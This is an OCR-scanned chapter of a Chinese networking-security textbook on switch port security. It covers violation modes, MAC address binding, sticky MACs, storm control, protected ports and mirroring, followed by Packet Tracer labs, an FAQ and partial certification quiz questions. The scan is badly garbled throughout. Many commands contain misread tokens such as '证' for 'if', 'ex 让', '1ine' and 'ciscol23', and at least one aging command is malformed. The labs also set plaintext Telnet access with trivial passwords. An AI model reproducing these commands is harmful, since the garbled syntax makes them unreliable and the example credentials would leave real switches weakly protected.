MAC 地 址 固定 下 来 ,成 为 安全 地 址 。 

如 果 交 换 机 的 一 个 端口 被 配置 为 安全 端口 . 且 其 安全 地 址 的 数目 已 经 达到 允许 最 大 
个 数 后 , 当 该 端口 收 到 一 个 源 地 址 不 属于 端口 上 的 安全 地 址 的 数据 包 时 ,将 会 产生 一 个 安 
全 违例 ,违例 的 处 理 模式 有 以 下 几 种 。 

(1) Protect: 保 护 端口 , 当 安 全 地 址 个 数 满 后 ,安全 端口 将 丢弃 未 知名 地 址 (不 是 该 端 
口 安 全 地 址 的 任何 一 个 ) 的 数据 包 。 

(2) Restrict: 当 违例 产生 时 ,将 发 送 一 个 Trap 通知 。 

(3) Shutdown: 当 违例 产生 时 ,将 关闭 端口 并 发 送 一 个 Trap 通知 。 当 端口 因为 违例 
而 被 关闭 后 ,可 以 在 全 局 配置 模式 下 使 用 命令 errdisable recovery 来 将 接口 从 错误 状态 
中 恢复 过 来 。 
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全 24 交换 机 端口 安全 配置 
1. 默认 配置 什 


交换 机 端口 安全 的 默认 设置 有 4 项 : 交换 机 所 有 端口 默认 关闭 端口 安全 功能 ; 
加 交换 机 端口 默认 的 最 大 安全 地 址 个 数 为 128; @@ 交 换 机 端口 默认 没有 安全 地 址 ; @ 交 
换 机 端口 默认 的 违例 处 理 方法 是 保护 。 


2. 查看 交换 机 端口 安全 信息 


在 特权 模式 开始 时 ,可 以 通过 下 列 命令 来 查看 。 

(1) show port-security interface [interface-id]: 查看 端口 的 安全 配置 信息 。 

(2) show port-security address: 查看 安全 地 址 信息 。 

(3) show port-security [interface-id] address: 显示 某 个 端口 上 的 安全 地 址 信息 。 

(4) show port-security: 显示 所 有 安全 端口 的 统计 信息 ,包括 最 大 安全 地 址 数 ,当前 
安全 地 址 数 及 违例 处 理 方式 等 。 

(5) show mac-address-table: 查看 交换 机 所 有 端口 的 MAC 地 址 信息 。 


3. 安全 端口 设置 和 违例 处 理 


从 特权 模式 开始 ,按照 以 下 步骤 来 配置 一 个 安全 端口 和 违例 处 理 方式 。 

(1) configure terminal: 进入 全 局 配置 模式 。 

(2) interface interface-id: 进入 接口 配置 模式 。 

(3) switchport mode access: 设置 接口 为 access 模式 。 

(4) switchport port-security: 打开 端口 安全 功能 。 

(5) switchport port-security maximum value: 设置 端口 上 安全 地 址 的 最 大 个 数 , 范 
围 为 1 一 128 ,默认 128。 

(6) switchport port-security violation {protect| restrict| shutdown}: 设置 违例 的 处 
理 方式 。 

(7) end: 回 到 特权 模式 。 

(8) show mac-address-table: 验证 配置 。 

(9) copy running-config startup-config: 保持 配置 。 

注意 : 在 交换 机 端口 配置 模式 下 ,可 以 使 用 命令 no switchport port-security 来 关闭 
一 个 接口 的 端口 安全 功能 。 使 用 命令 no switchport port-security maximum 来 恢复 安全 
地 址 的 默认 值 。 使 用 命令 no switchport port-security violation 来 将 违例 处 理 设置 为 默 


认 模 式 保护 。 

例如 ,在 交换 机 端口 F0/2 上 配置 端口 安全 功能 .设置 最 大 地 址 个 数 为 4, 违 例 处 理 
方式 为 protect。 

Switch> enable // 进 入 特权 模式 


Switch# configure terminal // 进 入 全 局 配置 模式 








[本 [ 项目 15 企业 网 中 一 层 网 络 设备 的 安全 设置 < 


Switch(config) # interface fastethernet 0/2 // 打 开交 换 机 F 0/2 端口 
Switch(config— if)#switchport mode access 

// 设 置 交换 机 端口 为 access 模式 , 即 只 能 连接 计算 机 , 若 需 连接 交换 机 则 将 交换 机 端口 设 
// 置 为 trunk 模式 

Switch(config 一 证 ) # switchport port- security // 端 口 开启 安全 模式 
Switch(config— if)#switchport port — security maximum4 

// 设 置 交 换 机 端口 的 最 大 连接 数 为 4, 即 该 端口 最 多 只 能 接 人 4 台 计 算 机 
Switch(config— 证 ) # switchport port — security violation protect 

// 将 违例 处 理 设置 为 protect 模式 

Switch(config — 证 ) #end // 回 到 特权 模式 
Switch# show port - security interface fastethernet 0/2 


// 查 看 F 0/2 端口 的 安全 配置 信息 ,包括 违例 处 理 的 模式 和 可 以 绑 定 的 最 大 地 址 个 数 
4. IP 地 址 及 MAC 地 址 绑 定 


从 特权 模式 开始 ,按照 以 下 步骤 来 配置 一 个 安全 端口 上 的 安全 地 址 。 

(1) configure terminal: 进入 全 局 配置 模式 。 

(2) interface interface-id: 进入 端口 配置 模式 。 

(3) switchport port-security mac-address mac-address [ip-address ip-address ]: 手 
工 配 置 端口 安全 地 址 。 

(4) end: 回 到 特权 模式 。 

(5) show port-security address: 验证 配置 。 

(6) copy running-config startup-config: 保持 配置 。 

注意 : 在 交换 机 端口 配置 模式 下 ,可 以 使 用 命令 no switchport port-security mac- 
address mac-address 来 删除 该 端口 的 安全 地 址 。 

例如 ,在 交换 机 端口 F 0/3 上 配置 端口 安全 功能 , 绑 定 MAC 地 址 0090. 
0CCC. 84AD。 


Switch > enable // 进 入 特权 模式 

Switch# configure terminal // 进 入 全 局 配置 模式 
Switch(config) # interface fastethernet 0/3 // 打 开交 换 机 F 0/3 端口 
Switch(config — if) # switchport mode access // 设 置 交换 机 端口 为 access 模式 


Switch(config 一 证 ) # switchport port- security // 端 口 F 0/3 开启 安全 模式 
Switch(config - if)# switchport port — security mac - address 0090. 0CCC. 84AD 


// 配 置 交换 机 端口 地 址 的 绑 定 
Switch(config— if)#end // 回 到 特权 模式 
Switch# show port - security address // 查 看 地 址 安全 绑 定 


5. 交换 机 风暴 控制 


当 交 换 机 VLAN 中 存在 过 量 的 广播 ` 多 播 或 未 知 单 播 数据 包 时 ,就 会 导致 网 络 变 慢 
和 报 文 传输 超时 。 可 以 针对 广播 风暴 数据 流 进 行 风暴 控制 。 协 议 栈 的 执行 错误 或 者 对 网 
络 的 错误 配置 都 有 可 能 导致 风暴 产生 。 可 以 分 别 对 广播 .多 播 和 未 知 单 播 数据 流 进行 风 
暴 控制 。 当 端口 接收 到 的 广播 ,多 播 或 未 知 单 播 数据 包 的 速率 超过 所 设 定 的 阔 值 时 ,设备 
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将 只 允许 传输 不 超过 所 设 定 冰 值 带宽 的 报 文 , 超 出 阔 值 的 报 文 将 被 丢弃 ,直到 数据 流 恢复 
正常 ,从 而 避免 过 量 的 洪 泛 报 文 进入 VLAN 中 形成 风暴 。 默 认 情 况 下 ,针对 广播 多 播 、 
未 名 单 播 的 风暴 控制 功能 均 被 关闭 。 当 按 一 定 的 百分比 为 一 个 端口 限制 带宽 后 ,所 有 端 
口 都 必须 按 这 个 百分比 带宽 设置 ,否则 设置 失败 。 

从 特权 模式 开始 ,按照 以 下 步骤 来 配置 交换 机 一 个 端口 上 的 风暴 控制 。 

(1) configure terminal: 进入 全 局 配置 模式 。 

(2) interface interface-id: 指定 欲 配 置 的 端口 ,进入 端口 配置 模式 。 

(3) storm-control {broadcast| multicast| unicast) {level percent| pps packets | rate- 
bps} : 配置 广播 ,广播 或 单 播 风 暴 控制 。 默 认 状态 下 ,风暴 控制 被 禁用 ,通常 情况 下 ,应当 
启用 广播 风暴 控制 。 其 中 ,broadcast 为 打开 对 广播 风暴 的 控制 功能 ; multicast 为 打开 对 
多 播 风 暴 的 控制 功能 ; unicast 为 打开 对 未 知 单 播 风暴 的 控制 功能 ; level percent 为 带宽 
的 百分比 ; packets 为 pps 单位 ; rate-bps 为 允许 通过 的 速率 。 

(4) end: 回 到 特权 模式 。 

注意 : 在 端口 配置 模式 下 ,使 用 命令 no storm-control broadcast、no storm-control 
multicast、no storm-control unicast 来 关闭 相应 端口 的 风暴 控制 功能 。 

例如 ,打开 交换 机 G 0/2 端口 上 的 风暴 控制 功能 ,设置 阻塞 闵 值 为 流量 的 50%。 

Switch> enable // 进 入 特权 模式 

Switch# configure terminal // 进 入 全 局 配置 模式 

Switch(config) # interface gigabitethernet 0/2  // 打 开交 换 机 G 0/2 端口 


Switch(config - if)# Storm— control broadcast level 50 
// 打 开交 换 机 G 0/2 端口 的 广播 控制 功能 ,并 设置 阻塞 阔 值 为 流量 的 50 % 


Switch(config - if) # end // 回 到 特权 模式 
Switch# show storm— control broadcast // 查 看 风暴 控制 状态 ,可 以 看 到 设置 效果 
6. 流 控 制 


从 特权 模式 开始 ,按照 以 下 步骤 来 配置 一 个 端口 上 的 流 控 制 。 

(1) configure terminal: 进入 全 局 配置 模式 。 

(2) interface interface-id: 进入 接口 配置 模式 。 

(3) flowcontrol {receive| send} {on|offl desired} : 设置 端口 的 流 控制 。 

(4) end: 返回 特权 配置 模式 。 

(5) show interfaces interface-id switchport: 显示 端口 状态 。 

(6) copy running-config startup-config: 保持 配置 。 

注意 : Packet Tracer 不 支持 流 控制 的 设置 .需要 在 真实 的 交换 机 上 进行 配置 。 


7. 交换 机 端口 保护 


在 某 些 应 用 环境 下 ,要 求 同 一 交换 机 上 的 指定 端口 之 间 不 能 进行 通信 。 在 这 种 环境 
下 ,可 以 通过 将 这 些 指定 端口 设置 为 保护 端口 来 实现 。 保 护 端口 之 间 无 法 通信 ,保护 端口 
不 向 其 他 保护 端口 转发 任何 传输 。 不 论 是 广播 帧 .多 播 帧 或 是 单 播 帧 ,都 具有 通过 三 层 设 
备 转发 才能 通信 。 保 护 端口 与 非 保护 端口 间 的 传输 不 受 任 何 影响 ,可 以 正常 通信 。 配 置 
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保护 端口 可 以 使 用 如 下 命令 。 
Switch(config— if)# switchport protected 


注意 : 可 以 使 用 命令 no switchport protected 将 一 个 端口 重新 设置 为 非 保护 端口 。 
例如 ,可 将 交换 机 G 0/2 端口 设置 为 保护 端口 。 


Switch > enable // 进 入 特权 模式 
Switch# configure terminal // 进 入 全 局 配置 模式 
Switch(config) # interface gigabitethernet 0/2 // 打 开交 换 机 G 0/2 端口 
Switch(config - 证 ) # switchport protected // 将 端口 设置 为 保护 端口 
Switch(config — 证 ) #end // 回 到 特权 模式 
Switch# show interface switchport // 显 示 保 护 端 口 


注意 : Packet Tracer 不 支持 老化 时 间 的 设置 ,需要 在 真实 的 交换 机 上 进行 配置 。 
8. 端口 阻塞 


从 特权 模式 开始 ,按照 以 下 步骤 来 配置 端口 阻塞 。 

(1) configure terminal: 进入 全 局 配置 模式 。 

(2) interface interface-id: 进入 端口 配置 模式 。 

(3) Switchport block multicast: 禁止 未 知 多 播 从 该 端口 向 外 传输 。 

(4) Switchport block unicast: 禁止 未 知 单 播 从 该 端口 向 外 传输 。 

(5) end: 返回 特权 配置 模式 。 

(6) show interfaces interface-id switchport: 显示 端口 状态 。 

(7) copy running-config startup-config: 保持 配置 。 

注意 : Packet Tracer 不 支持 端口 阻塞 的 设置 ,需要 在 真实 的 交换 机 上 进行 配置 。 


9. 安全 地 址 的 老化 时 间 设 置 


可 以 为 一 个 端口 上 所 有 安全 地 址 配置 老化 时 间 ,static 表示 时 间 将 同时 应 用 于 手工 配置 
的 安全 地 址 和 学 习 的 地 址 ,否则 只 应 用 于 自动 学 习 的 地 址 。time 表示 这 个 端口 上 安全 地 址 
的 老化 时 间 ,范围 是 0 一 1440min。 如 果 设 置 为 0, 则 相当 于 老化 功能 被 关闭 。 老 化 时 间 按 
照 绝 对 的 方式 计时 ,也 就 是 一 个 地 址 成 为 一 个 端口 的 安全 地 址 后 ,经 过 time 指定 的 时 间 
后 ,这 个 地 址 就 被 自动 删除 ,time 的 默认 值 为 0。 安 全 地 址 老化 时 间 的 具体 步 又 如 下 。 

(1) configure terminal: 进入 全 局 配置 模式 。 

(2) interface interface-id: 进入 端口 配置 模式 。 

(3) switchport port-security aging {static|time time}: 设置 老化 时 间 。 

(4) switchport port-security violation {protect| restrict| shutdown): 设置 违例 的 处 
理 方式 。 

(5) end: 回 到 特权 模式 。 

(6) show port-security interface [interface-id]: 验证 配置 。 

(7) copy running-config startup-config: 保持 配置 。 

注意 : 可 以 在 交换 机 端口 配置 模式 下 使 用 命令 no switchport port-security aging 
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time 来 关闭 一 个 端口 的 安全 地 址 老化 功能 (老化 时 间 为 0)。 使 用 命令 no switchport 
port-security aging static 来 使 老化 时 间 仅 应 用 于 动态 学 习 到 的 安全 地 址 。 

例如 ,在 交换 机 端口 F 0/2 配置 端口 安全 的 老化 时 间 , 老 化 时 间 为 10min, 老 化 时 间 
应 用 于 静态 配置 的 安全 地 址 。 


Switch > enable // 进 入 特权 模式 
Switch# configure terminal // 进 入 全 局 配置 模式 
Switch(config) # interface fastethernet0/2 // 打 开交 换 机 F 0/3 端口 


Switch(config— if)#switchport port — security aging time 10 

// 配 置 交 换 机 端口 F 0/2 的 老化 时 间 为 10min 
Switch(config— if)# switchport port - security static 

// 将 老化 时 间 应 用 于 静态 配置 的 安全 地 址 
Switch(config — if) # end // 回 到 特权 模式 


注意 : Packet Tracer 不 支持 老化 时 间 的 设置 ,需要 在 真实 的 交换 机 上 进行 配置 。 
全 25 交换 机 镜像 安全 技术 


交换 机 的 镜像 技术 (Port Mirroring) 是 将 交换 机 某 个 端口 的 数据 流量 ,复制 到 另 一 端 
口 ( 镜 像 端 口 ) 进 行 监测 。 大 多 数 交 换 机 都 支持 镜像 技术 ,可 以 对 交换 机 进行 方便 的 故障 
诊断 , 称 为 Mirroring 或 Spanning。 默 认 情 况 下 ,交换 机 的 这 种 功能 是 被 屏蔽 的 。 

通过 配置 交换 机 端口 镜像 ,允许 管理 人 员 设 置 监视 管理 端口 ,监视 端口 的 数据 流量 。 
可 以 通过 计算 机 上 安全 的 网 络 分 析 软 件 查 看 监视 到 的 数据 ,通过 对 捕获 到 的 数据 进行 分 
析 , 可 以 实时 查看 被 监视 端口 的 情况 。 交 换 机 镜像 端口 既 可 以 实现 一 个 VLAN 中 若干 各 
源 端 口 向 一 个 监控 端口 镜像 数据 ,有 可 以 从 若干 个 VLAN 向 一 个 监控 端口 镜像 数据 。 例 
如 ,将 交换 机 5 号 端口 上 所 有 数据 流 镜像 至 交换 机 上 10 号 监控 端口 ,并 通过 该 监控 端口 
接收 所 有 来 自 5 号 端口 的 数据 流 。 值 得 注意 的 是 , 源 端口 和 镜像 端口 最 好 位 于 同一 台 交 
换 机 上 。 交 换 机 的 镜像 端口 并 不 会 影响 端口 的 数据 交换 , 它 只 是 将 源 端 口 发 送 或 接收 的 
数据 包 副本 发 送 到 监控 端口 。 在 交换 机 上 配置 交换 机 的 端口 镜像 ,命令 如 下 。 


Switch(config) # monitor session 1 source interface fastethernet 0/1 both // 被 监控 端口 
Switch(config) # monitor session 1 destination interface fastethernet 0/2 // 镜 像 端 口 


15.3 方案 设计 


方案 设计 如 表 15-1 所 示 。 
表 15-1 方案 设计 
任务 名 称 企业 网 中 二 层 网 络 设备 的 安全 设置 
1. 利用 Packet Tracer 设置 交换 机 的 Telnet 远程 登录 


任务 分 解 2. 利用 Packet Tracer 手动 绑 定 MAC 地 址 实现 交换 机 的 端口 安全 
3. 利用 Packet Tracer 黏 滞 安 全 MAC 地 址 配置 交换 机 的 端口 安全 
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续 表 








. 掌握 实现 交换 机 远程 登录 安全 的 方法 
. 掌握 配置 交换 机 远程 登录 密码 的 方法 
. 掌握 保护 交换 机 端口 安全 的 方法 

. 掌握 开启 交换 机 安全 端口 功能 的 方法 
. 掌握 配置 交换 机 最 大 连接 数 的 方法 
. 掌握 配置 安全 违例 的 处 理 方式 

. 掌握 配置 交换 机 端口 捆绑 安全 地 址 
. 掌握 在 交换 机 端口 配置 风暴 控制 功能 
. 掌握 设置 阻塞 阔 值 的 方法 

10. 掌握 查看 风暴 控制 状态 的 方法 

11. 熟悉 配置 交换 机 端口 镜像 技术 


.了解 交换 机 网 络 安 全 基础 

. 熟悉 交换 机 远程 登录 技术 

. 熟悉 交换 机 端口 保护 技术 

. 熟悉 交换 机 端口 安全 违例 的 处 理 方式 
.了解 交换 机 端口 的 默认 设置 

. 了解 交换 机 产生 广播 风暴 的 原因 

. 熟悉 配置 交换 机 端口 镜像 技术 


.树立 较 强 的 安全 意识 

.培养 吃苦 耐劳 实事求是 一丝不苟 的 工作 态度 
.培养 分 析 能 力 和 应 变 能 力 

. 具有 可 持续 发 展 能 力 

. 了 解 网 络 安全 行业 的 基本 情况 


能 力 目标 


-I 


知识 目标 


本 





素质 目标 


am mo ea 于 





15.4 项 目 实 施 


全 41 任务 1: 利用 Packet Tacer 设置 交换 机 的 Tenet 远程 登录 
1. 任务 目标 


(1) 掌握 交换 机 登录 密码 的 安全 作用 。 
(2) 掌握 交换 机 远程 登录 的 配置 方法 。 


2. 案例 导入 


为 保护 企业 网 络 安全 ,需要 给 接 入 交换 机 设备 配置 远程 登录 管理 密码 ,该 接 入 交换 机 
负责 企业 楼 层 中 各 个 办 公 室 计算 机 的 接口 。 一 方面 禁止 非 授权 用 户 的 访问 ; 另 一 方面 方 
便 网 络 管理 员 通 过 远程 方式 管理 办 公 网 交换 机 。 
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3. 工作 环境 


(1) 一 台 预 装 Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 
4. 实施 过 程 


本 任务 中 ,计算 机 可 以 先 用 一 条 配置 线 ,一端 连接 到 交换 机 的 配置 端口 (Console) ,一 
端 连接 到 计算 机 的 串口 ; 再 使 用 一 根 直通 网 线 ,一 端 连接 到 交换 机 的 以 太 网 口 
(FastEthernet) , 另 一 端 连接 到 计算 机 的 RJ-45 网 卡 端口 ; 为 计算 机 和 交换 机 配置 同 网 络 
的 IP 地 址 使 其 实现 网 络 连 通 ; 在 网 络 连 通 情况 下 ,实现 交换 机 的 远程 登录 管理 ,如 


图 15-1 所 示 。 
= 


PC-PT SR 
PCO 
192.168.1.2/24 192.168.1.1/24 


图 15-1 交换 机 的 远程 登录 管理 


(1) 将 计算 机 与 交换 机 通过 一 根 直通 网 线 连接 并 安装 好 配置 线 。 
(2) 配置 主机 IP 的 地 址 和 子 网 掩 码 。 
(3) 配置 交换 机 Switch0 ,命令 如 下 。 


Switch0 > enable // 进 入 特权 模式 

Switch0 # configure terminal // 进 入 全 局 配置 模式 

Switch0(config) # interface vlan 1 // 默 认 情 况 下 交换 机 所 有 端口 都 处 于 vlan 1 中 
Switch0(config - i)# ip address 192.168.1.1 255.255.255.0 // 配 置 交换 机 的 管理 IP 地 址 
Switch0(config - if) # no shutdown // 开 启 vlan 1 端口 


Switch0(config- if)#exit 

Switch0(config) # enable password 123 // 设 置 进入 特权 模式 的 密码 为 123 
Switch0(config) # line console 0 

Switch0(config - line) # password cisco // 设 置 通 过 Console 端口 连接 设备 的 密码 为 cisco 
Switch0(config - line) # login 

Switch0(config - line) # ex 让 


SwitchO(config)#1ine vty 0 4 // 启 动 线程 

Switch0(config 一 1ine) #password ciscol23 // 设 置 Telnet 远程 登录 密码 为 cisco123 
Switch0(config - line) # login // 激 活 线程 

Switch0(config- line) # end // 回 到 特权 模式 


(4) 验证 通过 Console 端口 连接 设备 的 密码 : 在 计算 机 的 “远程 终端 "窗口 中 单 击 
OK 按钮 ,在 Password 后 输入 通过 Console 端口 连接 设备 的 密码 “cisco”, 成 功 登 录 到 交 
换 机 上 ,命令 如 下 。 


Press RETURN to get started. 








User Access Verification 


Password: // 这 里 输入 Console 端口 连接 设备 的 密码 “cisco” 

Switch> 

(5) 验证 进入 特权 模式 的 密码 : 在 Password 后 输入 进入 特权 模式 的 密码 “123”, 成 
功 进入 交换 机 的 特权 模式 ,命令 如 下 。 


Switch > enable // 进 入 特权 模式 
Password: // 这 里 输入 进入 特权 模式 密码 “123” 
Switch# 


(6) 验证 Telnet 远程 登录 密码 : 在 计算 机 的 “命令 提示 符 ” 窗 口中 ,首先 使 用 ping 命 
令 测 试 与 交换 机 的 连通 性 ,能 正常 连通 后 ,使 用 命令 telnet 192. 168. 1. 1 进行 验证 。 在 
Password 后 输入 Telnet 远程 登录 密码 “cisco123”, 成 功 登 录 到 交换 机 上 ,命令 如 下 。 

C:\> telnet 192.168.1.1 

Trying 192.168.1.1 ...Open 

User Access Verification 


Password: // 这 里 输入 Telnet 远程 登录 密码 “cisco123” 


Switch> 
巧 42 任务 2: 利用 Packet Tracer 手动 绑 定 MC 地 址 实现 交换 机 
端口 安全 
1. 任务 目标 


(1) 掌握 交换 机 端口 的 安全 作用 。 
(2) 掌握 交换 机 端口 的 MAC 地 址 绑 定 方法 。 


2. 案例 导入 


公司 要 求 对 网 络 进行 严格 控制 ,为 了 防止 公司 内 部 用 户 的 全 地 址 冲突 ,防止 公司 内 部 
的 网 络 攻击 和 破坏 行为 ,可 为 每 一 位 用 户 分 配 固定 的 全 地 址 ,并 且 只 允许 公司 员工 主机 可 
以 使 用 网 络 , 不 得 随意 连接 其 他 主机 。 例 如 , 某 员工 分 配 的 全 地 址 是 192. 168.1.10, 主 机 的 
MAC 地 址 是 0030. A30A. 6612。 


3. 工作 环境 


(1) 一 台 预 装 Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 
4. 实施 过 程 


本 任务 中 ,公司 网 络 接 入 交换 机 的 所 有 端口 配置 最 大 连接 数 为 1, 并 对 公司 内 部 每 台 
计算 机 连接 的 交换 机 端口 进行 MAC 地 址 绑 定 。 本 任务 的 网 络 拓扑 图 如 图 15-2 所 示 ,IP 
地 址 信息 如 表 15-2 所 示 。 
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15-2 任务 2 网 络 拓扑 图 


表 15-2 任务 2 IP 地 址 信息 表 











主机 名 称 PC0 PC1 PC2 
IP 地 址 192. 168. 1. 10 192. 168. 1. 20 192. 168. 1. 30 
子 网 掩 码 255. 255. 255.0 255. 255. 255. 0 255. 255. 255. 0 











(1) 将 3 台 主 机 与 交换 机 通过 直通 线 连接 。 

(2) 按照 IP 地 址 信息 表 配 置 3 台 主 机 IP 地 址 和 子 网 掩 码 ,在 主机 PC2 上 使 用 ping 
命令 ,确认 与 主机 PCO 和 PC1 的 网 络 连通 性 。 

(3) 配置 交换 机 Switch0 端口 的 最 大 连接 数 限制 。 


Switch > enable // 进 入 特权 模式 

Switch# configure terminal // 进 入 全 局 配置 模式 

Switch(config) # interface range fastethernet 0/1- 24 // 打 开交 换 机 1 一 24 端口 
Switch(config - if - range) # switchport mode access 

// 设 置 交换 机 的 24 个 端口 为 access 模式 , 即 只 能 连接 计算 机 , 若 需 连接 交换 机 则 将 交换 机 端口 设 
// 置 为 trunk 模式 

Switch(config if - range) # switchport port - security // 端 口 开 启 安全 模式 

Switch(config - if - range) # switchport port - security maximum 1 

// 配 置 交换 机 端口 的 最 大 连接 数 限制 为 1, 即 每 个 端口 最 多 只 能 接 入 1 台 计 算 机 


(4) 配置 交换 机 Switch0 端口 的 安全 违例 处 理 方式 。 


Switch(config - 证 - range) # switchport port - security violation shutdown 

// 设 置 交换 机 的 端口 违例 处 理 方式 为 shutdown 

Switch(config - if - range) # end // 返 回 特 权 配 置 模 式 

Switch# show port - security // 验 证 测试 ,查看 交换 机 的 端口 安全 配置 


(5) 配置 交换 机 Switch0 端口 的 地 址 绑 定 ,查看 主机 PC0 的 IP 地 址 和 MAC 地 址 信 
息 ,得 到 PC0 的 IP 地 址 为 192. 168. 1. 10,MAC 地 址 为 0030. A30A. 6612。 


Switch > enable // 进 入 特权 模式 
Switch# configure terminal // 进 入 全 局 配置 模式 
Switch(config) # interface fastethernet 0/1 // 打 开交 换 机 F 0/1 端口 


Switch(config— if)#switchport port — security // 端 口 开启 安全 模式 
Switch(config - if)# switchport port — security mac - address 0030. A30A.6612 
// 配 置 交换 机 端口 MAC 地 址 绑 定 
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Switch(config — if) # end // 回 到 特权 模式 

(6) 查看 地 址 绑 定 配置 。 

Switch# show port - securtiy address // 查 看 地 址 绑 定 配置 信息 

(7) 此 时 可 以 进行 效果 验证 : 此 时 PC2 可 以 正常 Ping 通 PC0 ,但 如 果 换 成 另外 一 台 
PC3 接 入 交换 机 的 F 0/1 端口 ,不 仅 导 致 PC1 主机 Ping 不 通 PC4, 而 且 还 会 发 现 交 换 机 
的 F 0/1 端口 因为 违例 被 shutdown 了 ,如 果 想 自 此 开启 F 0/1 端口 ,使 用 no shutdown 


命令 是 不 管用 的 ,只 能 使 用 errdisable recovery 命令 来 恢复 ,但 该 命令 不 能 在 Packet 
Tracer 中 使 用 。 


巧 43 任务 3: 利用 Packet Tracer 黏 滞 安全 MAC 地 址 配置 交换 机 
端口 安全 


1. 任务 目标 


(1) 掌握 交换 机 端口 安全 的 作用 。 
(2) 掌握 交换 机 端口 的 黏 滞 安 全 MAC 地 址 方法 。 


2. 案例 导入 


公司 要 求 网 络 管理 员 对 企业 网 络 进行 严格 控制 ,为 防止 公司 内 部 用 户 的 网 络 攻击 和 
破坏 行为 ,为 每 个 员工 分 配 固定 的 IP 地 址 ,并 且 只 允许 公司 内 部 员工 主机 可 以 使 用 网 络 ， 
不 得 随意 连接 其 他 主机 。 


3. 工作 环境 


(1) 一 台 预 装 Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 实施 过 程 


根据 公司 的 网 络 拓扑 图 ( 见 图 15-3) ,将 公司 网 络 接 入 交换 机 的 所 有 端口 配置 最 大 连 
接 数 为 2, 并 对 公司 内 部 每 台 计 算 机 连接 的 交换 机 端口 进行 MAC 地 址 绑 定 。 网 络 IP 地 
址 信息 如 表 15-3 所 示 。 


S s 6 
PC-PT PC-PT PC-PT PC-PT PC-PT 
PC0 PC1 PC2 PC3 PC4 


15-3 任务 3 网 络 拓扑 图 
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表 15-3 任务 3 IP 地 址 信息 表 








主机 名 称 PC0 PC1 PC2 PC3 PC4 





IP 地 址 192. 168.0. 2 192. 168. 0. 3 192. 168. 0. 4 192. 168. 0.5 192. 168. 0.6 





子 网 掩 码 255. 255. 255. 0 | 255. 255. 255. 0 | 255. 255. 255. 0 | 255. 255. 255. 0 | 255. 255. 255. 0 




















(1) 将 3 台 主 机 与 交换 机 通过 直通 线 连接 ,两 台 主 机 通过 Hub 与 交换 机 相连 。 

(2) 按照 IP 地 址 信息 表 配 置 5 台 主 机 IP 地 址 和 子 网 掩 码 ,在 PC4 上 使 用 ping 命 
令 ,确认 与 另外 4 台 主 机 的 网 络 连通 性 。 

(3) 配置 交换 机 Switch0 。 


Switch > enable // 进 入 特权 模式 

Switch# show mac- address- table // 可 以 看 到 交换 机 的 5 个 端口 动态 学 习 到 不 同 的 MAC 地 址 ， 
// 即 type 为 DYNAMIC 

Switch# configure terminal // 进 入 全 局 配置 模式 

Switch(config) # interface range fastethernet 0/1- 24  // 打 开交 换 机 1 一 24 端口 

Switch(config— 证 - range) # switchport mode access 

// 设 置 交 换 机 的 24 个 端口 为 access 模式 , 即 只 能 连接 计算 机 , 若 需 连 接 交换 机 则 将 交换 机 端口 设 

// 置 为 trunk 模式 

Switch(config- if - range) # switchport port - security “// 端 口 开启 安全 模式 

Switch(config— if — range) # switchport port - security maximum 2 

// 配 置 交换 机 端口 的 最 大 连接 数 限制 为 2, 即 每 个 端口 最 多 只 能 接 入 2 台 计 算 机 

Switch(config— if - range) # switchport port - security mac - address sticky 

// 设 置 交 换 机 的 端口 将 自动 学 习 到 的 MAC 地 址 固定 下 来 

Switch(config — if - range) # end // 回 到 特权 模式 


(4) 在 PC4 上 使 用 ping 命令 再 次 与 男 外 4 台 主 机 确认 一 下 网 络 连通 性 ,然后 查看 交 
换 机 5 个 端口 的 MAC 地 址 学 习 情 况 。 

Switch# show mac - address- table // 可 以 看 到 交换 机 的 5 个 端口 静态 学 习 到 不 同 的 MAC 地 址 ， 

// 即 type 为 STATIC 

(5) 进行 效果 验证 : 在 Hub 上 添加 计算 机 PC5, 并 配置 IP 地 址 为 192. 168. 0.7, 子 网 
掩 码 为 255. 255. 255.0, 发 现 交换 机 与 Hub 的 连接 状态 指示 灯 立 刻 变 成 红色 ,在 交换 机 
上 使 用 show mac-address-table 命令 查看 ,发现 只 剩 下 3 个 端口 .其 中 连接 Hub 的 F 0/1 
已 经 down 了 。 

(6) 对 每 个 端口 接 人 计算 机 的 数目 进行 验证 : 修改 一 次 PC2 的 MAC 地 址 ,发 现 从 
PC4 仍然 可 以 Ping 通 PC2 ,因为 修改 过 MAC 地 址 的 PC2 被 交换 机 当成 了 端口 接 入 的 第 
二 台 计 算 机 。 再 次 修改 PC2 的 MAC 地 址 ,发 现 连 接 状态 指示 灯 变 成 红色 ,在 交换 机 上 使 
用 show mac-address-table 命令 查看 交换 机 的 F 0/2 端口 已 经 down 了 ,只 剩 下 F 0/3 和 
F 0/4 的 MAC 地 址 。 
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15.5 常见 问题 解答 


1. 交换 机 密码 设置 命令 enable password 和 enable secret 的 区 别 是 什么 ? 

答 : enable secret 命令 用 于 设置 加 密 的 密码 ,enable password 命令 用 于 设置 明文 密 
码 。 主 要 区 别 就 是 当 使 用 show running-config 查看 配置 信息 的 时 候 , 如 果 用 的 是 enable 
password 命令 ,那么 就 可 以 看 到 密码 是 什么 ; 如 果 用 的 是 enable secret 命令 ,那么 只 能 看 
到 加 密 的 字符 串 ,看 不 懂 密 码 是 什么 。 

2. 交换 机 因为 违例 被 shutdown 的 端口 如 何 重新 开启 ? 

答 : 使 用 no shutdown 命令 是 不 行 的 ,只 能 使 用 errdisable recovery 命令 。 


15.6 认证 试题 


一 、 选 择 题 


1. 网 络 隔离 技术 的 目标 是 确保 把 有 害 的 攻击 隔离 ,在 保证 可 信 网 络 内 部 信息 部 不 外 
泄 的 前 提 下 ,完成 网 络 间 数 据 的 安全 交换 。 下 列 隔离 技术 中 ,安全 性 最 好 的 是 ( 
A. 多 重 安全 网 关  ”B. 防火 墙 C. VLAN 隔离 D. 物理 隔离 
2. 通过 交换 机 连接 的 一 组 工作 站 ( »s 
A. 组 成 一 个 冲突 域 ,但 不 是 一 个 广播 域 
B. 组 成 一 个 广播 域 .但 不 是 一 个 冲突 域 
C. 既是 一 个 冲突 域 ,又 是 一 个 广播 域 
D. 既 不 是 冲突 域 ,也 不 是 广播 域 
3. 公司 网 管 员 在 交换 机 上 创建 了 3 个 VLAN, 分 别 是 vlan 1、vlan 10 和 vlan 100, 并 
